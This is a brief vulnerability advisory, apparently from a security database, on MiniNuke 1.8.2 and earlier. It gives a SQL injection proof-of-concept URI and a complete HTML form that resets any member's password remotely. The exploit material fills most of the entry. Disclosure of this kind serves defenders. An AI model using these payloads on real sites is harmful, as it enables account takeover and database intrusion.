|
|
MiniNuke Multiple Input Validation Vulnerabilities
An exploit is not required. The following proof of concept URI for the SQL injection issue is available: http://www.example.com/news.asp?Action=Print&hid=[SQLQuery] The following example POST request for the password change issue is available: HTML Example [code] <html> <title>MiniNuke <= 1.8.2 remote user password change</title> <form method="POST" action="http://www.example.com/membership.asp?action=lostpassnew"> <table border="0" cellspacing="1" cellpadding="0" align="center" width="75%"> <tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the blanks</font></td></tr> <tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password </font></td></tr> <tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD: </font></td> <td width="50%"><input type="text" name="pass" size="20"></td></tr> <tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again : </font></td> <td width="50%"><input type="text" name="passa" size="20"><input type="text" name="x" value="Membername"> <input type="submit" value="Send" name="B1" style="font-family: Verdana; font-size: 10px; border: 1px ridge #FFFFFF; background-color: #FFFFFF"></td></tr> </table></form> </html> [/code] A proof of concept exploit for the password change issue by Hessam-x is also available. |
|
Privacy Statement |